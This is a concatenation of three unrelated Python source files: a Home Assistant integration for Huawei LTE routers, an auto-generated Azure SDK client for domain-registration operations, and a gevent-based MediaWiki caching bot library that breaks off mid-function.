def device_connections(self) -> Set[Tuple[str, str]]: """Get router connections for device registry.""" return {(dr.CONNECTION_NETWORK_MAC, self.mac)} if self.mac else set() def _get_data(self, key: str, func: Callable[[None], Any]) -> None: if not self.subscriptions.get(key): return _LOGGER.debug("Getting %s for subscribers %s", key, self.subscriptions[key]) try: self.data[key] = func() except ResponseErrorNotSupportedException: _LOGGER.info( "%s not supported by device, excluding from future updates", key ) self.subscriptions.pop(key) except ResponseErrorLoginRequiredException: if isinstance(self.connection, AuthorizedConnection): _LOGGER.debug("Trying to authorize again...") if self.connection.enforce_authorized_connection(): _LOGGER.debug( "...success, %s will be updated by a future periodic run", key, ) else: _LOGGER.debug("...failed") return _LOGGER.info( "%s requires authorization, excluding from future updates", key ) self.subscriptions.pop(key) finally: _LOGGER.debug("%s=%s", key, self.data.get(key)) def update(self) -> None: """Update router data.""" if self.suspended: _LOGGER.debug("Integration suspended, not updating data") return self._get_data(KEY_DEVICE_INFORMATION, self.client.device.information) if self.data.get(KEY_DEVICE_INFORMATION): # Full information includes everything in basic self.subscriptions.pop(KEY_DEVICE_BASIC_INFORMATION, None) self._get_data( KEY_DEVICE_BASIC_INFORMATION, self.client.device.basic_information ) self._get_data(KEY_DEVICE_SIGNAL, self.client.device.signal) self._get_data( KEY_DIALUP_MOBILE_DATASWITCH, self.client.dial_up.mobile_dataswitch ) self._get_data(KEY_MONITORING_STATUS, self.client.monitoring.status) self._get_data( KEY_MONITORING_TRAFFIC_STATISTICS, self.client.monitoring.traffic_statistics ) self._get_data(KEY_WLAN_HOST_LIST, self.client.wlan.host_list) self.signal_update() def logout(self) -> None: """Log out router session.""" if not isinstance(self.connection, AuthorizedConnection): return try: 
self.client.user.logout() except ResponseErrorNotSupportedException: _LOGGER.debug("Logout not supported by device", exc_info=True) except ResponseErrorLoginRequiredException: _LOGGER.debug("Logout not supported when not logged in", exc_info=True) except Exception: # pylint: disable=broad-except _LOGGER.warning("Logout error", exc_info=True) def cleanup(self, *_) -> None: """Clean up resources.""" self.subscriptions.clear() for handler in self.unload_handlers: handler() self.unload_handlers.clear() self.logout() @attr.s class HuaweiLteData: """Shared state.""" hass_config: dict = attr.ib() # Our YAML config, keyed by router URL config: Dict[str, Dict[str, Any]] = attr.ib() routers: Dict[str, Router] = attr.ib(init=False, factory=dict) async def async_setup_entry(hass: HomeAssistantType, config_entry: ConfigEntry) -> bool: """Set up Huawei LTE component from config entry.""" url = config_entry.data[CONF_URL] # Override settings from YAML config, but only if they're changed in it # Old values are stored as *_from_yaml in the config entry yaml_config = hass.data[DOMAIN].config.get(url) if yaml_config: # Config values new_data = {} for key in CONF_USERNAME, CONF_PASSWORD: if key in yaml_config: value = yaml_config[key] if value != config_entry.data.get(f"{key}_from_yaml"): new_data[f"{key}_from_yaml"] = value new_data[key] = value # Options new_options = {} yaml_recipient = yaml_config.get(NOTIFY_DOMAIN, {}).get(CONF_RECIPIENT) if yaml_recipient is not None and yaml_recipient != config_entry.options.get( f"{CONF_RECIPIENT}_from_yaml" ): new_options[f"{CONF_RECIPIENT}_from_yaml"] = yaml_recipient new_options[CONF_RECIPIENT] = yaml_recipient yaml_notify_name = yaml_config.get(NOTIFY_DOMAIN, {}).get(CONF_NAME) if ( yaml_notify_name is not None and yaml_notify_name != config_entry.options.get(f"{CONF_NAME}_from_yaml") ): new_options[f"{CONF_NAME}_from_yaml"] = yaml_notify_name new_options[CONF_NAME] = yaml_notify_name # Update entry if overrides were found if new_data or 
new_options: hass.config_entries.async_update_entry( config_entry, data={**config_entry.data, **new_data}, options={**config_entry.options, **new_options}, ) # Get MAC address for use in unique ids. Being able to use something # from the API would be nice, but all of that seems to be available only # through authenticated calls (e.g. device_information.SerialNumber), and # we want this available and the same when unauthenticated too. host = urlparse(url).hostname try: if ipaddress.ip_address(host).version == 6: mode = "ip6" else: mode = "ip" except ValueError: mode = "hostname" mac = await hass.async_add_executor_job(partial(get_mac_address, **{mode: host})) def get_connection() -> Connection: """ Set up a connection. Authorized one if username/pass specified (even if empty), unauthorized one otherwise. """ username = config_entry.data.get(CONF_USERNAME) password = config_entry.data.get(CONF_PASSWORD) if username or password: connection = AuthorizedConnection( url, username=username, password=password, timeout=CONNECTION_TIMEOUT ) else: connection = Connection(url, timeout=CONNECTION_TIMEOUT) return connection def signal_update() -> None: """Signal updates to data.""" dispatcher_send(hass, UPDATE_SIGNAL, url) try: connection = await hass.async_add_executor_job(get_connection) except Timeout as ex: raise ConfigEntryNotReady from ex # Set up router and store reference to it router = Router(connection, url, mac, signal_update) hass.data[DOMAIN].routers[url] = router # Do initial data update await hass.async_add_executor_job(router.update) # Clear all subscriptions, enabled entities will push back theirs router.subscriptions.clear() # Set up device registry device_data = {} sw_version = None if router.data.get(KEY_DEVICE_INFORMATION): device_info = router.data[KEY_DEVICE_INFORMATION] serial_number = device_info.get("SerialNumber") if serial_number: device_data["identifiers"] = {(DOMAIN, serial_number)} sw_version = device_info.get("SoftwareVersion") if 
device_info.get("DeviceName"): device_data["model"] = device_info["DeviceName"] if not sw_version and router.data.get(KEY_DEVICE_BASIC_INFORMATION): sw_version = router.data[KEY_DEVICE_BASIC_INFORMATION].get("SoftwareVersion") if sw_version: device_data["sw_version"] = sw_version device_registry = await dr.async_get_registry(hass) device_registry.async_get_or_create( config_entry_id=config_entry.entry_id, connections=router.device_connections, name=router.device_name, manufacturer="Huawei", **device_data, ) # Forward config entry setup to platforms for domain in CONFIG_ENTRY_PLATFORMS: hass.async_create_task( hass.config_entries.async_forward_entry_setup(config_entry, domain) ) # Notify doesn't support config entry setup yet, load with discovery for now await discovery.async_load_platform( hass, NOTIFY_DOMAIN, DOMAIN, { CONF_URL: url, CONF_NAME: config_entry.options.get(CONF_NAME, DEFAULT_NOTIFY_SERVICE_NAME), CONF_RECIPIENT: config_entry.options.get(CONF_RECIPIENT), }, hass.data[DOMAIN].hass_config, ) # Add config entry options update listener router.unload_handlers.append( config_entry.add_update_listener(async_signal_options_update) ) def _update_router(*_: Any) -> None: """ Update router data. Separate passthrough function because lambdas don't work with track_time_interval. 
""" router.update() # Set up periodic update router.unload_handlers.append( async_track_time_interval(hass, _update_router, SCAN_INTERVAL) ) # Clean up at end hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, router.cleanup) return True async def async_unload_entry( hass: HomeAssistantType, config_entry: ConfigEntry ) -> bool: """Unload config entry.""" # Forward config entry unload to platforms for domain in CONFIG_ENTRY_PLATFORMS: await hass.config_entries.async_forward_entry_unload(config_entry, domain) # Forget about the router and invoke its cleanup router = hass.data[DOMAIN].routers.pop(config_entry.data[CONF_URL]) await hass.async_add_executor_job(router.cleanup) return True async def async_setup(hass: HomeAssistantType, config) -> bool: """Set up Huawei LTE component.""" # Arrange our YAML config to dict with normalized URLs as keys domain_config = {} if DOMAIN not in hass.data: hass.data[DOMAIN] = HuaweiLteData(hass_config=config, config=domain_config) for router_config in config.get(DOMAIN, []): domain_config[url_normalize(router_config.pop(CONF_URL))] = router_config def service_handler(service) -> None: """Apply a service.""" url = service.data.get(CONF_URL) routers = hass.data[DOMAIN].routers if url: router = routers.get(url) elif not routers: _LOGGER.error("%s: no routers configured", service.service) return elif len(routers) == 1: router = next(iter(routers.values())) else: _LOGGER.error( "%s: more than one router configured, must specify one of URLs %s", service.service, sorted(routers), ) return if not router: _LOGGER.error("%s: router %s unavailable", service.service, url) return if service.service == SERVICE_CLEAR_TRAFFIC_STATISTICS: if router.suspended: _LOGGER.debug("%s: ignored, integration suspended", service.service) return result = router.client.monitoring.set_clear_traffic() _LOGGER.debug("%s: %s", service.service, result) elif service.service == SERVICE_REBOOT: if router.suspended: _LOGGER.debug("%s: ignored, integration suspended", 
service.service) return result = router.client.device.reboot() _LOGGER.debug("%s: %s", service.service, result) elif service.service == SERVICE_RESUME_INTEGRATION: # Login will be handled automatically on demand router.suspended = False _LOGGER.debug("%s: %s", service.service, "done") elif service.service == SERVICE_SUSPEND_INTEGRATION: router.logout() router.suspended = True _LOGGER.debug("%s: %s", service.service, "done") else: _LOGGER.error("%s: unsupported service", service.service) for service in ADMIN_SERVICES: hass.helpers.service.async_register_admin_service( DOMAIN, service, service_handler, schema=SERVICE_SCHEMA, ) for url, router_config in domain_config.items(): hass.async_create_task( hass.config_entries.flow.async_init( DOMAIN, context={"source": SOURCE_IMPORT}, data={ CONF_URL: url, CONF_USERNAME: router_config.get(CONF_USERNAME), CONF_PASSWORD: router_config.get(CONF_PASSWORD), }, ) ) return True async def async_signal_options_update( hass: HomeAssistantType, config_entry: ConfigEntry ) -> None: """Handle config entry options update.""" async_dispatcher_send(hass, UPDATE_OPTIONS_SIGNAL, config_entry) async def async_migrate_entry(hass: HomeAssistantType, config_entry: ConfigEntry): """Migrate config entry to new version.""" if config_entry.version == 1: options = config_entry.options recipient = options[CONF_RECIPIENT] if isinstance(recipient, str): options[CONF_RECIPIENT] = [x.strip() for x in recipient.split(",")] config_entry.version = 2 hass.config_entries.async_update_entry(config_entry, options=options) _LOGGER.info("Migrated config entry to version %d", config_entry.version) return True @attr.s class HuaweiLteBaseEntity(Entity): """Huawei LTE entity base class.""" router: Router = attr.ib() _available: bool = attr.ib(init=False, default=True) _unsub_handlers: List[Callable] = attr.ib(init=False, factory=list) @property def _entity_name(self) -> str: raise NotImplementedError @property def _device_unique_id(self) -> str: """Return unique ID for 
entity within a router.""" raise NotImplementedError @property def unique_id(self) -> str: """Return unique ID for entity.""" return f"{self.router.mac}-{self._device_unique_id}" @property def name(self) -> str: """Return entity name.""" return DEFAULT_NAME_TEMPLATE.format(self.router.device_name, self._entity_name) @property def available(self) -> bool: """Return whether the entity is available.""" return self._available @property def should_poll(self) -> bool: """Huawei LTE entities report their state without polling.""" return False @property def device_info(self) -> Dict[str, Any]: """Get info for matching with parent router.""" return {"connections": self.router.device_connections} async def async_update(self) -> None: """Update state.""" raise NotImplementedError async def async_update_options(self, config_entry: ConfigEntry) -> None: """Update config entry options.""" pass async def async_added_to_hass(self) -> None: """Connect to update signals.""" self._unsub_handlers.append( async_dispatcher_connect(self.hass, UPDATE_SIGNAL, self._async_maybe_update) ) self._unsub_handlers.append( async_dispatcher_connect( self.hass, UPDATE_OPTIONS_SIGNAL, self._async_maybe_update_options ) ) async def _async_maybe_update(self, url: str) -> None: """Update state if the update signal comes from our router.""" if url == self.router.url: self.async_schedule_update_ha_state(True) async def _async_maybe_update_options(self, config_entry: ConfigEntry) -> None: """Update options if the update signal comes from our router.""" if config_entry.data[CONF_URL] == self.router.url: await self.async_update_options(config_entry) async def async_will_remove_from_hass(self) -> None: """Invoke unsubscription handlers.""" for unsub in self._unsub_handlers: unsub() self._unsub_handlers.clear()
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar import warnings from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.mgmt.core.exceptions import ARMErrorFormat from msrest import Serializer from .. 
import models as _models from .._vendor import _convert_request, _format_url_section T = TypeVar('T') JSONType = Any ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False def build_list_request( subscription_id: str, **kwargs: Any ) -> HttpRequest: api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains') path_format_arguments = { "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_get_request( name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 
'str') return HttpRequest( method="GET", url=url, params=query_parameters, headers=header_parameters, **kwargs ) def build_list_agreements_request( name: str, subscription_id: str, *, json: JSONType = None, content: Any = None, **kwargs: Any ) -> HttpRequest: content_type = kwargs.pop('content_type', None) # type: Optional[str] api_version = "2020-09-01" accept = "application/json" # Construct URL url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] if content_type is not None: header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="POST", url=url, params=query_parameters, headers=header_parameters, json=json, content=content, **kwargs ) class TopLevelDomainsOperations(object): """TopLevelDomainsOperations operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.web.v2020_09_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. 
""" models = _models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list( self, **kwargs: Any ) -> Iterable["_models.TopLevelDomainCollection"]: """Get all top-level domains supported for registration. Description for Get all top-level domains supported for registration. :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either TopLevelDomainCollection or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TopLevelDomainCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomainCollection"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( subscription_id=self._config.subscription_id, template_url=self.list.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( subscription_id=self._config.subscription_id, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("TopLevelDomainCollection", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: 
map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return ItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'} # type: ignore @distributed_trace def get( self, name: str, **kwargs: Any ) -> "_models.TopLevelDomain": """Get details of a top-level domain. Description for Get details of a top-level domain. :param name: Name of the top-level domain. :type name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: TopLevelDomain, or the result of cls(response) :rtype: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomain :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomain"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) request = build_get_request( name=name, subscription_id=self._config.subscription_id, template_url=self.get.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('TopLevelDomain', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': 
'/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'} # type: ignore @distributed_trace def list_agreements( self, name: str, agreement_option: "_models.TopLevelDomainAgreementOption", **kwargs: Any ) -> Iterable["_models.TldLegalAgreementCollection"]: """Gets all legal agreements that user needs to accept before purchasing a domain. Description for Gets all legal agreements that user needs to accept before purchasing a domain. :param name: Name of the top-level domain. :type name: str :param agreement_option: Domain agreement options. :type agreement_option: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomainAgreementOption :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either TldLegalAgreementCollection or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TldLegalAgreementCollection] :raises: ~azure.core.exceptions.HttpResponseError """ content_type = kwargs.pop('content_type', "application/json") # type: Optional[str] cls = kwargs.pop('cls', None) # type: ClsType["_models.TldLegalAgreementCollection"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: _json = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption') request = build_list_agreements_request( name=name, subscription_id=self._config.subscription_id, content_type=content_type, json=_json, template_url=self.list_agreements.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: _json = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption') request = build_list_agreements_request( name=name, subscription_id=self._config.subscription_id, content_type=content_type, json=_json, template_url=next_link, ) 
request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("TldLegalAgreementCollection", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return ItemPaged( get_next, extract_data ) list_agreements.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'} # type: ignore
import os import datetime import heapq import itertools import collections import gevent import requests from gevent.event import AsyncResult, Event from gevent.queue import Queue, Empty from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker import sqlalchemy.exc import yaml try: import xml.etree.cElementTree as ElementTree except ImportError: import xml.etree.ElementTree as ElementTree from gwikibot import cacheschema from gwikibot import monkey monkey.patch() class PageProxy(object): """A page in a wiki The page may not be loaded when this object is created; accessing its attributes may block. A page is true in a boolean context if it exists on the wiki. (Note that the usage in a bool context may also block.) """ def __init__(self, cache, title): self.title = title self.cache = cache self._result = AsyncResult() self.edits = {} def _set_result(self, contents, page_info): self._contents = contents self.page_info = page_info self._result.set() @property def contents(self): """Return true if the page exists on the wiki""" self._result.get() return self._contents @property def exists(self): """Return true if the page exists on the wiki""" return self.contents is not None @property def text(self): """Return the contents of the page; raise ValueError if page missing""" self._result.get() if self.exists: return self.contents else: raise ValueError('Page does not exist') def __bool__(self): return self.exists __nonzero__ = __bool__ def edit(self, text, section=None): self._result.get() if not self.page_info['edittoken']: raise ValueError('This Page is not editable') else: self.edits[section] = text EditRequest(self.cache, self).go() class WikiCache(object): """A cache of a MediaWiki :param url_base: Base URL of the MediaWiki API, e.g. 'http://en.wikipedia.org/w/api.php' :param db_path: Path to a SQLite file holding the cache, or SQLAlchemy database URL. If not given, a file next to the wikicache module will be used. 
:param limit: The cache will not make more than one request each `limit` seconds. Use the cache as a dictionary: ``cache[page_title]`` will give you a PageProxy object. """ def __init__( self, url_base, db_url=None, force_sync=False, limit=5, verbose=False): self.verbose = verbose if db_url is None: db_url = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wikicache.sqlite') self.db_url = db_url if '://' not in db_url: db_url = os.path.abspath(db_url) db_url = 'sqlite:///' + db_url self._engine = create_engine(db_url) self._make_session = sessionmaker(bind=self._engine) self._url_base = url_base self.limit = limit self.request_queue = Queue(0) self._updated = Event() self._loop = gevent.spawn(self._request_loop, force_sync) def request(self, req): if self._loop.ready(): self.log('Restarting request loop') self._loop = gevent.spawn(self._request_loop) self._updated.wait() if req: self.request_queue.put(req) def get_wiki(self): """Get the wiki object, creating one if necessary""" session = self._make_session() query = session.query(cacheschema.Wiki).filter_by( url_base=self._url_base) try: wiki = query.one() except (sqlalchemy.exc.OperationalError, sqlalchemy.orm.exc.NoResultFound): cacheschema.metadata.create_all(self._engine) wiki = cacheschema.Wiki() wiki.url_base = self._url_base wiki.sync_timestamp = None session.add(wiki) session.commit() wiki.session = session return wiki def log(self, string): """Log a message""" # TODO: Something more fancy if self.verbose: print string def _sleep_seconds(self): """Number of seconds to sleep until next request""" now = lambda: datetime.datetime.today() try: next_time = self._next_request_time except AttributeError: return 0 else: sleep_seconds = (next_time - now()).total_seconds() if sleep_seconds > 0: return sleep_seconds else: return 0 def _sleep_before_request(self): """Sleep before another request can be made The request rate is controlled by the "limit" attribute """ sleep_seconds = self._sleep_seconds() if 
sleep_seconds > 0: self.log('Sleeping %ss' % sleep_seconds) gevent.sleep(sleep_seconds) def _apirequest_raw(self, **params): """Raw MW API request; returns Requests response""" self._sleep_before_request() try: self.log('POST {} {}'.format(self._url_base, params)) result = requests.post(self._url_base, data=params, stream=True) result.raise_for_status() return result finally: self._next_request_time = (datetime.datetime.today() + datetime.timedelta(seconds=self.limit)) def apirequest(self, **params): """MW API request; returns result dict""" params['format'] = 'yaml' return yaml.safe_load(self._apirequest_raw(**params).text) def update(self, force_sync=False): """Fetch a batch of page changes from the server""" wiki = self.get_wiki() if wiki.last_update and not force_sync: thresh = datetime.datetime.today() - datetime.timedelta(minutes=5) if wiki.last_update > thresh: self.log('Skipping update (last update was {})'.format( wiki.last_update)) return if wiki.sync_timestamp is None: self.log('Initial cache setup') feed = self.apirequest(action='query', list='recentchanges', rcprop='timestamp', rclimit=1) last_change = feed['query']['recentchanges'][0] wiki.sync_timestamp = last_change['timestamp'] wiki.synced = True self.invalidate_cache(wiki) wiki.session.commit() else: self.log('Updating cache') feed = self.apirequest(action='query', list='recentchanges', rcprop='title|user|timestamp', rclimit=100, rcend=wiki.sync_timestamp ) sync_timestamp = feed['query']['recentchanges'][0]['timestamp'] while feed: invalidated = set() changes = feed['query']['recentchanges'] for change in changes: title = change['title'] if title not in invalidated: self.log(u'Change to {0} by {1}'.format(title, change['user'])) obj = self._page_object(wiki, title) obj.last_revision = None invalidated.add(title) wiki.session.commit() try: feed = self.apirequest(action='query', list='recentchanges', rcprop='title|user|timestamp', rclimit=100, rcend=wiki.sync_timestamp, 
**feed['query-continue']['recentchanges'] ) except KeyError: feed = None wiki.sync_timestamp = sync_timestamp wiki.synced = True else: wiki.synced = False wiki.session.commit() wiki.last_update = datetime.datetime.today() wiki.session.commit() def _page_query(self, wiki): """Return a SQLA query for pages on this wiki""" return wiki.session.query(cacheschema.Page).filter_by(wiki=wiki) def _page_object(self, wiki, title): """Get an object for the page 'title', *w/o* adding it to the session """ title = self.normalize_title(title) obj = wiki.session.query(cacheschema.Page).get((self._url_base, title)) if obj: return obj else: obj = cacheschema.Page() obj.wiki = wiki obj.title = title obj.revision = None obj.last_revision = None return obj def _request_loop(self, force_sync=False): """The greenlet that requests needed metadata/pages """ self.update(force_sync=force_sync) self._updated.set() requests = {} while True: self.log('Request loop active') self.update() while True: while not self.request_queue.empty(): self.request_queue.get().insert_into(requests) gevent.sleep(0) try: request = self.request_queue.get( timeout=self._sleep_seconds()) except Empty: break else: request.insert_into(requests) request_list = [(k, v) for k, v in requests.items() if v] request_list.sort(key=lambda k_v: -len(k_v[1])) requests = dict(request_list) if request_list: for k, v in request_list[0][1].items(): v.run(requests) break if not request_list: self._sleep_before_request() if self.request_queue.empty(): self._updated.clear() self.log('Request loop exiting') return def invalidate_cache(self, wiki): """Invalidate the entire cache This marks all articles for re-downloading when requested. Note that articles with a current revision ID will not be re-downloaded entirely, only their metadata will be queried. (To clear the cache entirely, truncate the articles table.) 
""" self._page_query(wiki).update({'last_revision': None}) wiki.session.commit() def normalize_title(self, title): # TODO: http://www.mediawiki.org/wiki/API:Query#Title_normalization title = title.replace('_', ' ') title = title.replace('\n', '') return title[0].upper() + title[1:] def get(self, title, follow_redirect=False): """Return a page from this cache :param follow_redirect: If True, a Mediawiki redirect will be followed once. """ title = self.normalize_title(title) if follow_redirect: try: return self[self.redirect_target(title)] except KeyError: pass if not title: return default result = PageProxy(self, title) gevent.spawn(self._read, result) return result def _read(self, result, token_requests=()): """Greenlet to fill a PageProxy object Submits work to the queues until a page is fully fetched from the server, then sets the PageProxy result to unblock the consumer """ self.request(None) wiki = self.get_wiki() title = result.title obj = self._page_object(wiki, title) wiki.session.add(obj) wiki.session.commit() # Make sure we know the page's last revision # This is a loop with rollbacks in it, since the DB can change under us while True: # Fetch metadata to see if the page has changed (or is empty!) if obj.last_revision is None or (not obj.up_to_date and obj.contents is None) or token_requests: self.log('Requesting metadata for {}'.format(title)) page_info = MetadataRequest(self, title, token_requests).go() else: page_info = {} # Now, if metadata says we're out of date, actually fetch the page wiki.session.refresh(obj) if not obj.up_to_date: self.log('Requesting page {}'.format(title)) PageRequest(self, title).go() # If everything was successful, notify the caller! 
wiki.session.refresh(obj) if obj.up_to_date: result._set_result(obj.contents, page_info) wiki.session.rollback() return def __getitem__(self, title): """Return the content of a page, if it exists, or raise KeyError """ return self.get(title) def get_editable(self, title): title = self.normalize_title(title) result = PageProxy(self, title) gevent.spawn(self._read, result, ['edit']) return result class Request(object): """A request to the remote server Requests can be grouped together by a "group key". All requests with the same group key can be gotten with the same API request. The cache's request-loop will take requests, and as soon as there's enough of them for an an API request, it does that request. If there's not enough requests for a while, it fires an "incomplete" request. """ limit = 50 def __init__(self, cache): self.cache = cache self.result = AsyncResult() self._subordinates = [] def go(self): """Schedule the request and block until it's done""" self.cache.request(self) return self.result.get() def insert_into(self, all_requests): """Insert this request into the given dict Run this from the request-loop greenlet; it can do the actual API request if enough requests have accumulated. How many are needed is specified in the "limit" variable. 
""" peers = all_requests.setdefault(self.group_key, {}) try: master = peers[self.key] except KeyError: peers[self.key] = self else: master._subordinates.append(self) if len(peers) >= self.limit: self.run(all_requests) @property def group_key(self): return (self, ) @property def key(self): return self def run(self, all_requests): pass def _all_finished_requests(self, all_requests, key): master = all_requests.get(self.group_key, {}).pop(key, None) if master: yield master for s in master._subordinates: yield s def powerset(iterable): "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)" s = list(iterable) return itertools.chain.from_iterable( itertools.combinations(s, r) for r in range(len(s)+1)) class MetadataRequest(Request): limit = 100 def __init__(self, cache, title, token_requests): super(MetadataRequest, self).__init__(cache) self.title = title self.token_requests = tuple(sorted(token_requests)) self.result = AsyncResult() @property def group_key(self): return MetadataRequest, self.token_requests @property def key(self): return self.title def _all_finished_requests(self, all_requests, key): # A bit more complicated since we can mark all requests with a subset # of our tokens as done mdr, token_requests = self.group_key for subset in powerset(token_requests): peers = all_requests.get((MetadataRequest, subset), {}) master = peers.pop(key, None) if master: yield master for s in master._subordinates: yield s def run(self, all_requests): wiki = self.cache.get_wiki() titles = all_requests[self.group_key].keys() # TODO: Fill up request if we can fetch more kwargs = dict( action='query', info='lastrevid', prop='revisions', # should not be necessary on modern MW titles='|'.join(titles) ) if self.token_requests: kwargs['prop'] += '|info' kwargs['intoken'] = '|'.join(self.token_requests) result = self.cache.apirequest(**kwargs) assert 'normalized' not in result['query'], ( result['query']['normalized']) # XXX: normalization fetched_titles = [] for page_info 
